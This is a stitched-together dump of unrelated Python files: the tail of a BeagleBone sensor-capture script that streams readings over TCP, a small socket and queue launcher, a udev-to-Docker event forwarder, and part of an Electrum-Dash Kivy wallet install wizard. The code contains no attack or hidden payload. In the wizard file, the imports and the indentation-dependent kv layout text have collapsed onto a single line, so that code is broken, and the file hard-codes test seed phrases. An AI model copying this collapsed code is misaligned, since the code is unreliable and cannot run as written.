            self._port = int(f.readline()[:-1])
            self._label = f.readline()[:-1]

    def capture_sensor(self, mode='all'):
        """Start capture threads ('local', 'remote', or 'all') and block until interrupted."""
        ts = time.time()
        st = bg.get_datetime(ts).strftime('%Y-%m-%d_%H%M%S')
        threads = {}
        try:
            threads['local'] = threading.Thread(target=self.__send_to_local, args=(st,))
            threads['remote'] = threading.Thread(target=self.__send_to_remote, args=(st,))
            for key, thread in threads.items():
                if mode in [key, 'all']:
                    thread.daemon = True
                    thread.start()
            # Idle in the main thread; Ctrl-C (or any error) breaks us out.
            while True:
                time.sleep(100)
        except (KeyboardInterrupt, Exception):
            pass
        for _, thread in threads.items():
            # is_alive() replaces the isAlive() alias removed in Python 3.9.
            if thread.is_alive():
                thread.join()

    def __get_raw_data_row(self):
        """Sample the MPU once; returns [ts, (temp,) ax, ay, az, gx, gy, gz (, mx, my, mz)]."""
        ts = time.time()
        accel = self._mpu.mpu_read_accel()
        gyro = self._mpu.mpu_read_gyro()
        row = [ts]
        if self._axis_10:
            temp = self._mpu.mpu_read_temp()
            row += [temp]
        row += [accel['ax'], accel['ay'], accel['az']]
        row += [gyro['gx'], gyro['gy'], gyro['gz']]
        if self._axis_10:
            mag = self._mpu.mpu_read_mag()
            row += [mag['mx'], mag['my'], mag['mz']]
        return row

    def __send_to_local(self, st):
        """Continuously append sensor rows to a timestamped CSV file."""
        start_st = st
        sys.stdout.write('[%s] Start reading sensor data to local...\n' % st)
        sys.stdout.flush()
        try:
            with open(st + '.csv', 'w') as f:
                writer = csv.writer(f)
                if self._axis_10:
                    writer.writerow(['timestamp', 'temp',
                                     'imu_ax', 'imu_ay', 'imu_az',
                                     'imu_gx', 'imu_gy', 'imu_gz',
                                     'imu_mx', 'imu_my', 'imu_mz'])
                else:
                    writer.writerow(['timestamp',
                                     'imu_ax', 'imu_ay', 'imu_az',
                                     'imu_gx', 'imu_gy', 'imu_gz'])
                data_rows = 0
                while True:
                    try:
                        row = self.__get_raw_data_row()
                        writer.writerow(row)
                        data_rows += 1
                        if data_rows % 10000 == 0:
                            ts = time.time()
                            st = bg.get_datetime(ts).strftime('%Y-%m-%d_%H%M%S')
                            sys.stdout.write('[%s] %6d rows have been collected.\n' % (st, data_rows))
                            sys.stdout.flush()
                    except (KeyboardInterrupt, TypeError):
                        break
            # 'with' closed the file; the redundant explicit close() was removed.
            ts = time.time()
            st = bg.get_datetime(ts).strftime('%Y-%m-%d_%H%M%S')
            sys.stdout.write('[%s] \"%s\" was saved.\n' % (st, start_st + '.csv'))
            sys.stdout.flush()
        except IOError:
            sys.stderr.write('Failed to build CSV.\n')
            sys.stderr.flush()

    def __send_to_remote(self, st):
        """Continuously pickle sensor rows and stream them over a TCP socket."""
        sys.stdout.write('[%s] Start reading sensor data to remote...\n' % st)
        sys.stdout.flush()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((self._ip_addr, self._port))
        sys.stdout.write('connect %s successful\n' % self._ip_addr)
        sys.stdout.flush()
        data_rows = 0
        while True:
            try:
                row = self.__get_raw_data_row()
                send_row = row + [data_rows, self._label]
                send_data = pickle.dumps(send_row)
                sock.sendall(send_data)
                data_rows += 1
                if data_rows % 10000 == 0:
                    ts = time.time()
                    st = bg.get_datetime(ts).strftime('%Y-%m-%d_%H%M%S')
                    sys.stdout.write('[%s] %6d rows have been collected.\n' % (st, data_rows))
                    sys.stdout.flush()
            except KeyboardInterrupt:
                # Tell the receiver we are quitting before closing the socket.
                send_row = ['Q']
                sock.sendall(pickle.dumps(send_row))
                break
        sock.close()


def main():
    parser = argparse.ArgumentParser(description='Collect data from BeagleBone Blue')
    # BUG FIX: store_true needs a boolean default. The previous
    # default='True' (a truthy string) made axis_10 = not args['6']
    # evaluate to False whether or not the flag was passed, so the
    # option had no effect. With default=False: no flag -> 10-axis,
    # '-6' given -> 6-axis.
    # NOTE(review): the help text '10 Axis' looks inverted for a flag
    # named '-6' — confirm intended wording with the author.
    parser.add_argument('-6', help='10 Axis', action='store_true', default=False)
    args = vars(parser.parse_args())
    axis_10 = not args['6']
    bg_ = Beagle(axis_10)
    bg_.capture_sensor('all')
    return 0


if __name__ == '__main__':
    main()
run.py
'''Core run service: boots a socket-listening process and the main
queue-consuming process (see `run_core` in `initial`).
'''
from multiprocessing import Process, Queue

import json_socket
from log import log
from initial import run_core

standard_config = dict(
    socket_uri="ws://127.0.0.1:8009",
)

queue_prc = None
socket_prc = None


def _json_socket(uri):
    """Return the current JSON socket; (re)bind one for `uri` when given."""
    sock = json_socket.get_socket()
    if uri is not None:
        sock = json_socket.get_or_create(uri)
    return sock


def socket_receiver(queue, config=None):
    """Pump messages from the JSON socket into `queue` until 'kill' arrives.

    Returns False immediately when no socket is available.
    """
    settings = config or {}
    sock = _json_socket(settings.get('socket_uri', None))
    if sock is None:
        # no worker to run.
        return False
    while True:
        message = sock.recv()
        is_kill = message == 'kill'
        # The kill message is forwarded too, so consumers can observe it.
        queue.put(message)
        if is_kill:
            break
    log('finished socket_receiver')


def thread_run(queue=None, config=None):
    """Start the receiver and core processes; return (core_process, queue)."""
    global queue_prc
    global socket_prc
    settings = standard_config.copy()
    settings.update(config or {})
    work_queue = queue or Queue()
    socket_prc = Process(target=socket_receiver, args=(work_queue, settings))
    socket_prc.start()
    core_prc = Process(target=run_core, args=(work_queue, settings))
    core_prc.start()
    return core_prc, work_queue
udev-forward.py
#!/usr/bin/python3

# Copyright 2019 Linaro Limited
# Copyright (c) 2014 Taeyeon Mori (for MurmurHash2 code)

# Author: Kumar Gala <kumar.gala@linaro.org>

# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# The MurmurHash2 implementation is take from:
# https://github.com/Orochimarufan/cdev/blob/master/cdev/murmurhash2.py
#
# UDEV event forwarding to a container
#
# based on https://github.com/eiz/udevfw

import os
import sys
import socket
import pyudev
import syslog
import threading
import docker
import queue
import array
from struct import *
from ctypes import CDLL, get_errno
import argparse

# Netlink / libudev monitor constants used when re-emitting events.
NETLINK_KOBJECT_UEVENT = 15
UDEV_MONITOR_UDEV = 2
CLONE_NEWNET = 0x40000000
UDEV_MONITOR_MAGIC = 0xFEEDCAFE

# Maps container name -> containersClass (sender thread + its work queue).
containers = {}

class containersClass:
    # Per-container state: a placeholder Thread (replaced with the real
    # sender thread in start_up_thread) and the queue feeding it work items.
    def __init__(self):
        self.thread = threading.Thread()
        self.wq = queue.Queue()

# Pick the array typecode that yields 4-byte unsigned ints on this platform;
# MurmurHash2 below reads the input 32 bits at a time via array.array.
if array.array('L').itemsize == 4:
    uint32_t = 'L'
elif array.array('I').itemsize == 4:
    uint32_t = 'I'
else:
    raise ImportError("Could not determine 4-byte array code!")

def MurmurHash2(input, seed=0):
    """
    Generate a 32-bit hash from a string using the MurmurHash2 algorithm.

    Takes a bytestring! Pure-python implementation.
    """
    l = len(input)

    # m and r are mixing constants generated offline
    # They're not really magic, they just happen to work well
    m = 0x5bd1e995
    #r = 24

    # Initialize the hash to a "random" value
    h = seed ^ l

    # Mix 4 bytes at a time into the hash
    x = l % 4
    o = l - x

    for k in array.array(uint32_t, input[:o]):
        # Original Algorithm
        #k *= m;
        #k ^= k >> r;
        #k *= m;

        #h *= m;
        #h ^= k;

        # My Algorithm
        k = (k * m) & 0xFFFFFFFF
        h = (((k ^ (k >> 24)) * m) ^ (h * m)) & 0xFFFFFFFF
        # Explanation: We need to keep it 32-bit. There are a few rules:
        # 1. Inputs to >> must be truncated, it never overflows
        # 2. Inputs to * must be truncated, it may overflow
        # 3. Inputs to ^ may be overflowed, it overflows if any input was overflowed
        # 4. The end result must be truncated
        # Therefore:
        # b = k * m -> may overflow, we truncate it because b >> r cannot take overflowed data
        # c = b ^ (b >> r) -> never overflows, as b is truncated and >> never does
        # h = (c * m) ^ (h * m) -> both inputs to ^ may overflow, but since ^ can take it, we truncate once afterwards.

    # Handle the last few bytes of the input array
    if x > 0:
        if x > 2:
            h ^= input[o+2] << 16
        if x > 1:
            h ^= input[o+1] << 8
        h = ((h ^ input[o]) * m) & 0xFFFFFFFF

    # Do a few final mixes of the hash to ensure the last few
    # bytes are well incorporated
    # Original:
    #h ^= h >> 13;
    #h *= m;
    #h ^= h >> 15;
    h = ((h ^ (h >> 13)) * m) & 0xFFFFFFFF
    return (h ^ (h >> 15))

def bloomHash(tag):
    """Fold a tag's MurmurHash2 into a 64-bit bloom filter value
    (four bits set per tag, as in libudev's tag bloom filter)."""
    bits = 0
    hash = MurmurHash2(tag.encode())
    bits = bits | 1 << (hash & 63)
    bits = bits | 1 << ((hash >> 6) & 63)
    bits = bits | 1 << ((hash >> 12) & 63)
    bits = bits | 1 << ((hash >> 18) & 63)
    return bits

def buildHeader(proplen, subsys, devtype, taghash):
    """Pack a libudev monitor message header: magic, header size (twice,
    as offset and length), property-list length, subsystem/devtype hashes
    and the split 64-bit tag bloom filter, all in network byte order."""
    header_fmt = "8s8I"
    header_size = calcsize(header_fmt)

    subsys_hash = 0
    devtype_hash = 0

    if subsys:
        subsys_hash = socket.htonl(MurmurHash2(subsys.encode()))
    if devtype:
        devtype_hash = socket.htonl(MurmurHash2(devtype.encode()))

    tag_low = socket.htonl(taghash & 0xffffffff)
    tag_high = socket.htonl(taghash >> 32)

    return pack(header_fmt, b"libudev", socket.htonl(UDEV_MONITOR_MAGIC), header_size, header_size, proplen, subsys_hash, devtype_hash, tag_low, tag_high)

def BuildPacket(dev):
    """Serialize a pyudev Device into a libudev monitor datagram:
    header followed by NUL-terminated KEY=VALUE property strings."""
    subsys = dev.subsystem
    devtype = dev.device_type

    proplist = bytearray()
    for p in dev.properties:
        proppair = p + "=" + dev.properties[p]
        proplist = proplist + proppair.encode() + bytes([0])

    tag_hash = 0
    for t in dev.tags:
        tag_hash = tag_hash | bloomHash(t)

    hdr = buildHeader(len(proplist), subsys, devtype, tag_hash)
    return hdr + proplist

def errcheck(ret, func, args):
    """ctypes errcheck hook: raise OSError when a libc call returns -1."""
    if ret == -1:
        e = get_errno()
        raise OSError(e, os.strerror(e))

def sendMsgThread(inst, netns_file):
    """Worker thread body for one container: move this thread into the
    container's network namespace (setns), then replay queued "PKT" udev
    packets onto a NETLINK_KOBJECT_UEVENT socket there.

    A "DOCKER" work item closes the namespace fd and ends the thread.
    """
    nsfd = open(netns_file, "r")
    libc = CDLL('libc.so.6', use_errno=True)
    libc.setns.errcheck = errcheck
    # Switch this thread's network namespace to the container's.
    libc.setns(nsfd.fileno(), CLONE_NEWNET)

    sendfd = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW|socket.SOCK_NONBLOCK, NETLINK_KOBJECT_UEVENT)
    if options.debug:
        print(sendfd)

    while True:
        (work_type, pkt) = containers[inst].wq.get()
        if work_type == "PKT":
            # Older kernels (like 4.15 on Ubuntu 18.04) return ECONNREFUSED
            # to work around this we just ignore this specific error as the
            # data still is send on the socket.
            try:
                sendfd.sendto(pkt, (0, UDEV_MONITOR_UDEV))
            except ConnectionRefusedError:
                pass
        if work_type == "DOCKER":
            nsfd.close()
            break

def udev_event_callback(dev):
    """pyudev observer callback: fan the event out to every container
    whose sender thread is currently alive."""
    if options.debug:
        print('background event {0.action}: {0.device_path}'.format(dev))
    for i in containers:
        if containers[i].thread.is_alive():
            containers[i].wq.put(("PKT", BuildPacket(dev)))

def start_up_thread(name):
    """Look up the container's netns file (docker SandboxKey) and launch
    its sendMsgThread, registering it in the global `containers` map."""
    container = client.containers.get(name)
    ns_filename = container.attrs['NetworkSettings']['SandboxKey']
    if options.debug:
        print("DBG: Container[%s] netns file %s" % (name, ns_filename))
    containers[name] = containersClass()
    containers[name].thread = threading.Thread(name=name, target=sendMsgThread, args=(name, ns_filename))
    containers[name].thread.start()

def main():
    """Parse arguments, start the udev monitor observer, and forward
    events into the requested docker containers until interrupted."""
    parser = argparse.ArgumentParser(description='USB device passthrough for docker containers', add_help=False)
    parser.add_argument("-i", "--instance", type=str, required=True, action='append', help="Docker instance", dest="names")
    parser.add_argument("-d", "--debug", action="store_true", help="Enable Debug Logging")

    global options
    options = parser.parse_args()

    context = pyudev.Context()
    if options.debug:
        context.log_priority = syslog.LOG_DEBUG

    monitor = pyudev.Monitor.from_netlink(context)
    observer = pyudev.MonitorObserver(monitor, callback=udev_event_callback, name='monitor-observer')
    observer.start()

    global client
    client = docker.from_env()

    # If the container is running get the namespace file (SandboxKey)
    # and startup the sendMsgThread
    f = {'name': options.names, 'status': 'running'}
    if client.containers.list(filters=f):
        for name in options.names:
            start_up_thread(name)

    # Watch for docker events to startup or shutdown a new sendMsgThread
    f = {'type': 'container', 'event': ['start', 'stop'], 'container': options.names }
    try:
        for event in client.events(decode=True, filters=f):
            name = event['Actor']['Attributes']['name']
            if options.debug:
                print("DOCKER: %s for %s" % (event['Action'], name))
            if event['Action'] == 'start':
                start_up_thread(name)
            if event['Action'] == 'stop':
                containers[name].wq.put(("DOCKER", event['Action']))
                containers[name].thread.join()
    except KeyboardInterrupt:
        # On Ctrl-C, ask every live sender thread to shut down cleanly.
        for i in containers:
            if containers[i].thread.is_alive():
                containers[i].wq.put(("DOCKER", 'stop'))

if __name__ == '__main__':
    main()
installwizard.py
from functools import partial import threading import os from kivy.app import App from kivy.clock import Clock from kivy.lang import Builder from kivy.properties import ObjectProperty, StringProperty, OptionProperty from kivy.core.window import Window from kivy.uix.button import Button from kivy.utils import platform from kivy.uix.widget import Widget from kivy.core.window import Window from kivy.clock import Clock from kivy.utils import platform from electrum_dash.base_wizard import BaseWizard from electrum_dash.util import is_valid_email from . import EventsDialog from ...i18n import _ from .password_dialog import PasswordDialog # global Variables is_test = (platform == "linux") test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve" test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach" test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL" Builder.load_string(''' #:import Window kivy.core.window.Window #:import _ electrum_dash.gui.kivy.i18n._ <WizardTextInput@TextInput> border: 4, 4, 4, 4 font_size: '15sp' padding: '15dp', '15dp' background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1) foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1) hint_text_color: self.foreground_color background_active: 'atlas://electrum_dash/gui/kivy/theming/light/create_act_text_active' background_normal: 'atlas://electrum_dash/gui/kivy/theming/light/create_act_text_active' size_hint_y: None height: '48sp' <WizardButton@Button>: root: None size_hint: 1, None height: '48sp' on_press: if self.root: self.root.dispatch('on_press', self) on_release: if self.root: self.root.dispatch('on_release', self) <BigLabel@Label> color: .854, .925, .984, 1 size_hint: 1, None text_size: self.width, None height: self.texture_size[1] bold: True <-WizardDialog> text_color: .854, .925, .984, 1 value: '' 
#auto_dismiss: False size_hint: None, None canvas.before: Color: rgba: .239, .588, .882, 1 Rectangle: size: Window.size crcontent: crcontent # add electrum icon BoxLayout: orientation: 'vertical' if self.width < self.height else 'horizontal' padding: min(dp(27), self.width/32), min(dp(27), self.height/32),\ min(dp(27), self.width/32), min(dp(27), self.height/32) spacing: '10dp' GridLayout: id: grid_logo cols: 1 pos_hint: {'center_y': .5} size_hint: 1, None height: self.minimum_height Label: color: root.text_color text: 'DASH ELECTRUM' size_hint: 1, None height: self.texture_size[1] if self.opacity else 0 font_size: '33sp' font_name: 'electrum_dash/gui/kivy/data/fonts/tron/Tr2n.ttf' GridLayout: cols: 1 id: crcontent spacing: '1dp' Widget: size_hint: 1, 0.3 GridLayout: rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height WizardButton: id: back text: _('Back') root: root WizardButton: id: next text: _('Next') root: root disabled: root.value == '' <WizardMultisigDialog> value: 'next' Widget size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: _("Choose the number of signatures needed to unlock funds in your wallet") Widget size_hint: 1, 1 GridLayout: orientation: 'vertical' cols: 2 spacing: '14dp' size_hint: 1, 1 height: self.minimum_height Label: color: root.text_color text: _('From {} cosigners').format(n.value) Slider: id: n range: 2, 5 step: 1 value: 2 Label: color: root.text_color text: _('Require {} signatures').format(m.value) Slider: id: m range: 1, n.value step: 1 value: 2 <WizardChoiceDialog> message : '' Widget: size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message Widget size_hint: 1, 1 GridLayout: row_default_height: '48dp' orientation: 'vertical' id: choices cols: 1 spacing: '14dp' size_hint: 1, None <WizardConfirmDialog> message : '' Widget: size_hint: 1, 1 Label: color: 
root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message Widget size_hint: 1, 1 <WizardTOSDialog> message : '' size_hint: 1, 1 ScrollView: size_hint: 1, 1 TextInput: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.minimum_height text: root.message disabled: True <WizardEmailDialog> Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: 'Please enter your email address' WizardTextInput: id: email on_text: Clock.schedule_once(root.on_text) multiline: False on_text_validate: Clock.schedule_once(root.on_enter) <WizardKnownOTPDialog> message : '' message2: '' Widget: size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message Widget size_hint: 1, 1 WizardTextInput: id: otp on_text: Clock.schedule_once(root.on_text) multiline: False on_text_validate: Clock.schedule_once(root.on_enter) Widget size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message2 Widget size_hint: 1, 1 height: '48sp' BoxLayout: orientation: 'horizontal' WizardButton: id: cb text: _('Request new secret') on_release: root.request_new_secret() size_hint: 1, None WizardButton: id: abort text: _('Abort creation') on_release: root.abort_wallet_creation() size_hint: 1, None <WizardNewOTPDialog> message : '' message2 : '' Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message QRCodeWidget: id: qr size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message2 WizardTextInput: id: otp on_text: Clock.schedule_once(root.on_text) multiline: False on_text_validate: Clock.schedule_once(root.on_enter) <MButton@Button>: size_hint: 1, None height: '33dp' on_release: 
self.parent.update_amount(self.text) <WordButton@Button>: size_hint: None, None padding: '5dp', '5dp' text_size: None, self.height width: self.texture_size[0] height: '30dp' on_release: self.parent.new_word(self.text) <SeedButton@Button>: height: dp(100) border: 4, 4, 4, 4 halign: 'justify' valign: 'top' font_size: '18dp' text_size: self.width - dp(24), self.height - dp(12) color: .1, .1, .1, 1 background_normal: 'atlas://electrum_dash/gui/kivy/theming/light/white_bg_round_top' background_down: self.background_normal size_hint_y: None <SeedLabel@Label>: font_size: '12sp' text_size: self.width, None size_hint: 1, None height: self.texture_size[1] halign: 'justify' valign: 'middle' border: 4, 4, 4, 4 <RestoreSeedDialog> message: '' word: '' BigLabel: text: "ENTER YOUR SEED PHRASE" GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input_seed text: '' on_text: Clock.schedule_once(root.on_text) on_release: root.options_dialog() SeedLabel: text: root.message BoxLayout: id: suggestions height: '35dp' size_hint: 1, None new_word: root.on_word BoxLayout: id: line1 update_amount: root.update_text size_hint: 1, None height: '30dp' MButton: text: 'Q' MButton: text: 'W' MButton: text: 'E' MButton: text: 'R' MButton: text: 'T' MButton: text: 'Y' MButton: text: 'U' MButton: text: 'I' MButton: text: 'O' MButton: text: 'P' BoxLayout: id: line2 update_amount: root.update_text size_hint: 1, None height: '30dp' Widget: size_hint: 0.5, None height: '33dp' MButton: text: 'A' MButton: text: 'S' MButton: text: 'D' MButton: text: 'F' MButton: text: 'G' MButton: text: 'H' MButton: text: 'J' MButton: text: 'K' MButton: text: 'L' Widget: size_hint: 0.5, None height: '33dp' BoxLayout: id: line3 update_amount: root.update_text size_hint: 1, None height: '30dp' Widget: size_hint: 1, None MButton: text: 'Z' MButton: text: 'X' MButton: text: 'C' MButton: text: 'V' MButton: text: 'B' MButton: text: 'N' 
MButton: text: 'M' MButton: text: ' ' MButton: text: '<' <AddXpubDialog> title: '' message: '' BigLabel: text: root.title GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input text: '' on_text: Clock.schedule_once(root.check_text) SeedLabel: text: root.message GridLayout rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height IconButton: id: scan height: '48sp' on_release: root.scan_xpub() icon: 'atlas://electrum_dash/gui/kivy/theming/light/camera' size_hint: 1, None WizardButton: text: _('Paste') on_release: root.do_paste() WizardButton: text: _('Clear') on_release: root.do_clear() <ShowXpubDialog> xpub: '' message: _('Here is your master public key. Share it with your cosigners.') BigLabel: text: "MASTER PUBLIC KEY" GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input text: root.xpub SeedLabel: text: root.message GridLayout rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height WizardButton: text: _('QR code') on_release: root.do_qr() WizardButton: text: _('Copy') on_release: root.do_copy() WizardButton: text: _('Share') on_release: root.do_share() <ShowSeedDialog> spacing: '12dp' value: 'next' BigLabel: text: "PLEASE WRITE DOWN YOUR SEED PHRASE" GridLayout: id: grid cols: 1 pos_hint: {'center_y': .5} size_hint_y: None height: self.minimum_height orientation: 'vertical' spacing: '12dp' SeedButton: text: root.seed_text on_release: root.options_dialog() SeedLabel: text: root.message <LineDialog> BigLabel: text: root.title SeedLabel: text: root.message TextInput: id: passphrase_input multiline: False size_hint: 1, None height: '27dp' SeedLabel: text: root.warning ''') class WizardDialog(EventsDialog): ''' Abstract dialog to be used as the base for all Create Account Dialogs ''' crcontent = ObjectProperty(None) def __init__(self, wizard, 
**kwargs):
        # (continuation of 'def __init__(self, wizard,' above)
        super(WizardDialog, self).__init__()
        self.wizard = wizard
        self.ids.back.disabled = not wizard.can_go_back()
        self.app = App.get_running_app()
        # Callback invoked with get_params(...) when the user presses "Next".
        self.run_next = kwargs['run_next']
        # Re-fit the dialog whenever the window geometry changes.
        _trigger_size_dialog = Clock.create_trigger(self._size_dialog)
        Window.bind(size=_trigger_size_dialog,
                    rotation=_trigger_size_dialog)
        _trigger_size_dialog()
        self._on_release = False

    def _size_dialog(self, dt):
        """Size the dialog: full-screen on phones, scaled down on tablets."""
        app = App.get_running_app()
        if app.ui_mode[0] == 'p':
            self.size = Window.size
        else:
            #tablet
            if app.orientation[0] == 'p':
                #portrait
                self.size = Window.size[0]/1.67, Window.size[1]/1.4
            else:
                self.size = Window.size[0]/2.5, Window.size[1]

    def add_widget(self, widget, index=0):
        """Route children into the kv 'crcontent' grid once it exists."""
        if not self.crcontent:
            super(WizardDialog, self).add_widget(widget)
        else:
            self.crcontent.add_widget(widget, index=index)

    def on_dismiss(self):
        # Dismissing the wizard before any wallet exists quits the whole app.
        app = App.get_running_app()
        if app.wallet is None and not self._on_release:
            app.stop()

    def get_params(self, button):
        """Values forwarded to run_next(); overridden by subclasses."""
        return (None,)

    def on_release(self, button):
        # Dispatched by WizardButton presses: handles abort, Back and Next.
        self._on_release = True
        self.close()
        if not button:
            # no button -> dialog aborted
            self.parent.dispatch('on_wizard_complete', None)
            return
        if button is self.ids.back:
            self.wizard.go_back()
            return
        params = self.get_params(button)
        self.run_next(*params)


class WizardMultisigDialog(WizardDialog):
    """Choose m-of-n signature parameters for a multisig wallet."""

    def get_params(self, button):
        m = self.ids.m.value
        n = self.ids.n.value
        return m, n


class WizardOTPDialogBase(WizardDialog):
    """Shared logic for the TrustedCoin one-time-password dialogs."""

    def get_otp(self):
        # Return the 6-digit code as int, or None while the input is invalid.
        otp = self.ids.otp.text
        if len(otp) != 6:
            return
        try:
            return int(otp)
        except:  # NOTE(review): bare except; ValueError would suffice here
            return

    def on_text(self, dt):
        self.ids.next.disabled = self.get_otp() is None

    def on_enter(self, dt):
        # press next
        # NOTE(review): 'next' shadows the builtin; harmless in this scope.
        next = self.ids.next
        if not next.disabled:
            next.dispatch('on_release')


class WizardKnownOTPDialog(WizardOTPDialogBase):
    """Ask for the Google Authenticator code of an already-registered wallet."""

    def __init__(self, wizard, **kwargs):
        WizardOTPDialogBase.__init__(self, wizard, **kwargs)
        self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
        self.message2 = _("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
        self.request_new = False

    def get_params(self, button):
        return (self.get_otp(), self.request_new)

    def request_new_secret(self):
        # User lost their authenticator: flag the request and finish the dialog.
        self.request_new = True
        self.on_release(True)

    def abort_wallet_creation(self):
        # Delete the half-created wallet file and terminate the wizard.
        self._on_release = True
        os.unlink(self.wizard.storage.path)
        self.wizard.terminate()
        self.dismiss()


class WizardNewOTPDialog(WizardOTPDialogBase):
    """Show a fresh TOTP secret as a QR code and ask for a first code."""

    def __init__(self, wizard, **kwargs):
        WizardOTPDialogBase.__init__(self, wizard, **kwargs)
        otp_secret = kwargs['otp_secret']
        uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
        self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
        self.message2 = _('Then, enter your Google Authenticator code:')
        self.ids.qr.set_data(uri)

    def get_params(self, button):
        return (self.get_otp(), False)


class WizardTOSDialog(WizardDialog):
    """Display the TrustedCoin terms of service for acceptance."""

    def __init__(self, wizard, **kwargs):
        WizardDialog.__init__(self, wizard, **kwargs)
        self.ids.next.text = 'Accept'
        self.ids.next.disabled = False
        self.message = kwargs['tos']
        # NOTE(review): message2 is set here but the kv rule for this dialog
        # does not reference it -- presumably leftover; confirm before removing.
        self.message2 = _('Enter your email address:')


class WizardEmailDialog(WizardDialog):
    """Collect the user's email address for TrustedCoin registration."""

    def get_params(self, button):
        return (self.ids.email.text,)

    def on_text(self, dt):
        self.ids.next.disabled = not is_valid_email(self.ids.email.text)

    def on_enter(self, dt):
        # press next
        next = self.ids.next
        if not next.disabled:
            next.dispatch('on_release')


class WizardConfirmDialog(WizardDialog):
    """Simple yes/no style confirmation step."""

    def __init__(self, wizard, **kwargs):
        super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
        self.message = kwargs.get('message', '')
        self.value = 'ok'

    def on_parent(self, instance, value):
        if value:
            app = App.get_running_app()
            # Map the Android back button onto the app's back handling.
            self._back = _back = partial(app.dispatch, 'on_back')

    def get_params(self, button):
        return (True,)


class WizardChoiceDialog(WizardDialog):
    """Present a list of (action, label) choices as buttons."""

    def __init__(self, wizard, **kwargs):
        super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
        self.message = kwargs.get('message', '')
        choices = kwargs.get('choices', [])
        layout = self.ids.choices
        layout.bind(minimum_height=layout.setter('height'))
        for action, text in choices:
            l = WizardButton(text=text)
            l.action = action
            l.height = '48dp'
            l.root = self
            layout.add_widget(l)

    def on_parent(self, instance, value):
        if value:
            app = App.get_running_app()
            self._back = _back = partial(app.dispatch, 'on_back')

    def get_params(self, button):
        # The pressed button carries the action chosen in __init__.
        return (button.action,)


class LineDialog(WizardDialog):
    """Single-line free-text input (used e.g. for a seed passphrase)."""
    title = StringProperty('')
    message = StringProperty('')
    warning = StringProperty('')

    def __init__(self, wizard, **kwargs):
        WizardDialog.__init__(self, wizard, **kwargs)
        # Empty input is acceptable, so Next is always enabled.
        self.ids.next.disabled = False

    def get_params(self, b):
        return (self.ids.passphrase_input.text,)


class ShowSeedDialog(WizardDialog):
    """Display a newly generated seed for the user to write down."""
    seed_text = StringProperty('')
    message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
    # Whether the user opted to extend the seed with a passphrase.
    ext = False

    def __init__(self, wizard, **kwargs):
        super(ShowSeedDialog, self).__init__(wizard, **kwargs)
        self.seed_text = kwargs['seed_text']

    def on_parent(self, instance, value):
        if value:
            app = App.get_running_app()
            # Back button behaves like pressing the dialog's Back.
            self._back = _back = partial(self.ids.back.dispatch, 'on_release')

    def options_dialog(self):
        from .seed_options import SeedOptionsDialog
        def callback(status):
            self.ext = status
        d = SeedOptionsDialog(self.ext, callback)
        d.open()

    def get_params(self, b):
        return (self.ext,)


class WordButton(Button):
    pass


class WizardButton(Button):
    pass


class RestoreSeedDialog(WizardDialog):
    """Seed entry with an on-screen keyboard and word suggestions."""

    def __init__(self, wizard, **kwargs):
        super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
        # Validator callable deciding whether the typed seed is acceptable.
        self._test = kwargs['test']
        from electrum_dash.mnemonic import Mnemonic
        from electrum_dash.old_mnemonic import words as old_wordlist
        # Accept words from both the current and the legacy wordlist.
        self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
        self.ids.text_input_seed.text = test_seed if is_test else ''
        self.message = _('Please type your seed phrase using the virtual keyboard.')
        self.title = _('Enter Seed')
        self.ext = False

    def options_dialog(self):
        from .seed_options import SeedOptionsDialog
        def callback(status):
            self.ext = status
        d = SeedOptionsDialog(self.ext, callback)
        d.open()

